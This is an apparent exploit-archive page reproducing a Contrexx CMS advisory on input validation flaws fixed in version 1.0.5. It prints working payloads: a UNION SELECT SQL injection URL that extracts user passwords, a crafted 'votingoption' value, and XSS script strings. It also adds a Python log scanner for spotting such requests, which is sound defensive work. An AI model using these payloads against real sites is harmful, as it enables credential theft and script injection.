Contrexx Multiple Input Validation Vulnerabilities - exploit.company
Vendor: Contrexx CMS
By: Unknown
CVSS: 5.5 (MEDIUM)
HTML Injection, SQL Injection, Information Disclosure
CWE: 79
Product Name: Contrexx CMS
Affected Version From: Prior to 1.0.5
Affected Version To: 1.0.4
Patch Exists: YES
Platforms Tested: Unknown

Contrexx Multiple Input Validation Vulnerabilities

The Contrexx CMS is affected by multiple input validation vulnerabilities that allow for HTML injection, SQL injection, and information disclosure attacks. An attacker can exploit these vulnerabilities by supplying a specially crafted value for the 'votingoption' parameter and submitting the form. Additionally, the vulnerabilities can be exploited through the 'section' and 'term' parameters in specific URLs. These vulnerabilities can be used to carry out attacks such as executing arbitrary JavaScript code (XSS) and retrieving sensitive information from the database.

Mitigation:

Update to Contrexx version 1.0.5 or later to address these vulnerabilities. Additionally, input validation and sanitization should be implemented to prevent similar vulnerabilities in the future.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/14352/info

Contrexx is affected by multiple input validation vulnerabilities. These issues can allow an attacker to carry out HTML injection, SQL injection and information disclosure attacks.

Contrexx versions prior to 1.0.5 are affected. 

Supply the 'votingoption' parameter as value="1 /*!50030%20s*/" and submit the form.

/index.php?section=gallery&cmd=showCat&cid=41&pId=1%20/**/UNION/**/%20/**/SELECT/**/%201,1,CONCAT(username,'-',password),1,1,1%20/**/FROM%20contrexx_access_users

/index.php?section=search&term=%22%3E%3Cscr\ipt%3Ealert(%22xss%22)%3C/sc\ript%3E

Create a blog entry with the title <script>alert('xss')</script>
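
Requests of the kind listed above leave traces in web server access logs. The following Python script is an added example, not code from the advisory or from Contrexx: it flags query-string values that do not fit the expected shape of the 'cid', 'pId', 'section' and 'term' parameters. The combined log format, the assumption that 'cid' and 'pId' are plain integers and 'section' is a short alphanumeric name, and the sample log lines are all constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: these hold plain integers in normal use (the page shows cid=41, pId=1).
NUMERIC_PARAMS = {"cid", "pId"}
# Assumption: module names are short alphanumeric tokens ("gallery", "search").
SECTION_RE = re.compile(r"[A-Za-z0-9_]{1,32}")
# Angle brackets have no place in a search term and indicate injected markup.
MARKUP_RE = re.compile(r"[<>]")
# Request line of a combined-format access log entry.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[0-9.]+"')


def check_target(target):
    """Return sorted (parameter, reason) findings for one request target."""
    findings = set()
    # parse_qs percent-decodes values, so encoded input is inspected in clear.
    params = parse_qs(urlsplit(target).query, keep_blank_values=True)
    for name, values in params.items():
        for value in values:
            if name in NUMERIC_PARAMS and not re.fullmatch(r"[0-9]+", value):
                findings.add((name, "non-integer value"))
            elif name == "section" and not SECTION_RE.fullmatch(value):
                findings.add((name, "unexpected characters"))
            elif name == "term" and MARKUP_RE.search(value):
                findings.add((name, "markup characters"))
    return sorted(findings)


def scan(log_lines):
    """Yield (line_number, findings) for log lines with at least one finding."""
    for number, line in enumerate(log_lines, start=1):
        match = REQUEST_RE.search(line)
        findings = check_target(match.group(1)) if match else []
        if findings:
            yield number, findings


# Constructed sample log (not from the page); addresses are documentation ranges.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /index.php?section=gallery&cmd=showCat&cid=41&pId=1 HTTP/1.1" 200 5120',
    '192.0.2.77 - - [01/Jan/2024:10:00:05 +0000] "GET /index.php?section=gallery&cmd=showCat&cid=41&pId=1%20/**/UNION/**/%20SELECT%201 HTTP/1.1" 200 5300',
    '192.0.2.77 - - [01/Jan/2024:10:00:09 +0000] "GET /index.php?section=search&term=%22%3E%3Cb%3Etest%3C/b%3E HTTP/1.1" 200 2048',
    '192.0.2.10 - - [01/Jan/2024:10:00:12 +0000] "GET /index.php?section=search&term=holiday+photos HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    print(list(scan(SAMPLE_LOG)))
```

Form-body parameters such as 'votingoption' do not appear in access logs, so they need the same shape check at the application or WAF layer.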